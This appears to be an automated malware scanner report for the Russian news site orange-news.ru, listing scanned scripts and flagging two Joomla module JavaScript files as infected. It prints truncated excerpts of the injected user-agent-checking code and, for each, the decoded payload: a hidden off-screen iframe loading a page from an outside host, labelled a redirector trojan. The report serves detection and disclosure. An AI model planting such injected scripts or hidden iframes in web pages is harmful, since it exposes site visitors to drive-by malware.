New scan:

Malware Scanner report for orange-news.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "orange-news.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=orange-news.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://orange-news.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://orange-news.ru/
200 OK
Content-Length: 38836
Content-Type: text/html
clean
http://orange-news.ru/templates/yoo_downtown/warp/libraries/jquery/jquery.js
200 OK
Content-Length: 2057
Content-Type: application/x-javascript
clean
http://orange-news.ru/media/system/js/caption.js
200 OK
Content-Length: 4024
Content-Type: application/x-javascript
clean
http://orange-news.ru/templates/yoo_downtown/warp/js/warp.js
200 OK
Content-Length: 11054
Content-Type: application/x-javascript
clean
http://orange-news.ru/templates/yoo_downtown/warp/js/accordionmenu.js
200 OK
Content-Length: 3596
Content-Type: application/x-javascript
clean
http://orange-news.ru/templates/yoo_downtown/warp/js/dropdownmenu.js
200 OK
Content-Length: 7455
Content-Type: application/x-javascript
clean
http://orange-news.ru/templates/yoo_downtown/js/template.js
200 OK
Content-Length: 2960
Content-Type: application/x-javascript
clean
http://orange-news.ru/modules/mod_gk_news_highlighter/scripts/engine_compress.js
200 OK
Content-Length: 6837
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var uneindex = 0;
if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) {
return uneindex;
}
return false;
}
function view_user(){
var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch
... 3166 bytes are skipped ...
;if(d['animationType']==2||d['animationType']==3||d['animationType']==6||d['animationType']==7){q[j]=new Fx.Style(a,'top',{duration:d['animationSpeed'],transition:d['animationFun']})}else if(d['animationType']==4||d['animationType']==5){q[j]=new Fx.Style(a,'left',{duration:d['animationSpeed'],transition:d['animationFun']})}if(j!=0)p[j].hide();if(d['animationType']>1)q[j].set(0)});if(d['mouseover']){o.addEvent("mouseenter",function(){s=true});o.addEvent("mouseleave",function(){s=false})}}})});

Decoded script:


<iframe src="http://parter.softwarefinesse.com/hdfshtrdrudtfjd19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTZ [Trj]

http://orange-news.ru/modules/mod_gk_news_highlighter/scripts/importer.php?module_id=news-highlight-1&animation_type=1&animation_speed=300&animation_interval=5000&animation_fun=Fx.Transitions.linear&mouseover=1
200 OK
Content-Length: 240
Content-Type: text/javascript
clean
http://orange-news.ru/modules/mod_news_pro_gk4/interface/scripts/engine.js
200 OK
Content-Length: 10850
Content-Type: application/x-javascript
clean
http://orange-news.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js
200 OK
Content-Length: 4693
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var uneindex = 0;
if ((uneindex = haystack.indexOf(needle, f_offset)) !== -1) {
return uneindex;
}
return false;
}
function view_user(){
var change_user = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Ch
... 3640 bytes are skipped ...
{var r=new Fx.Scroll($E('.gk_npro_short_scroll1',e),{duration:h['animation_speed'],wheelStops:false});var s=$ES('.gk_npro_short_ulwrap',e);var t=$E('.gk_npro_short_scroll1',e).getSize().size.x;var u=0;if($E('.gk_npro_short_prev',e)){$E('.gk_npro_short_prev',e).addEvent("click",function(){if(u==0){r.scrollTo((s.length-1)*t,0);u=s.length-1}else{u--;r.scrollTo(u*t,0)}});$E('.gk_npro_short_next',e).addEvent("click",function(){if(u==s.length-1){r.scrollTo(0,0);u=0}else{u++;r.scrollTo(u*t,0)}})}}})});

Decoded script:


<iframe src="http://parter.softwarefinesse.com/hdfshtrdrudtfjd19.html" style="position:absolute;left:-1187px;top:-1187px;" height="125" width="125"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTZ [Trj]

http://orange-news.ru/templates/yoo_downtown/warp/js/search.js
200 OK
Content-Length: 6171
Content-Type: application/x-javascript
clean
http://userapi.com/js/api/openapi.js?1
200 OK
Content-Length: 64013
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21244
Content-Type: text/javascript
clean
http://orange-news.ru//mc.yandex.ru/metrika/watch.js/
404 Компонент не найден
Content-Length: 938
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: orange-news.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Jul 2014 20:43:55 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Jul 2014 20:43:55 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: dec41ec1f2095033a7830ab20e55d83d=59r0gfk9i1p476tancsct63037; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: orange-news.ru
Referer: http://www.google.com/search?q=orange-news.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.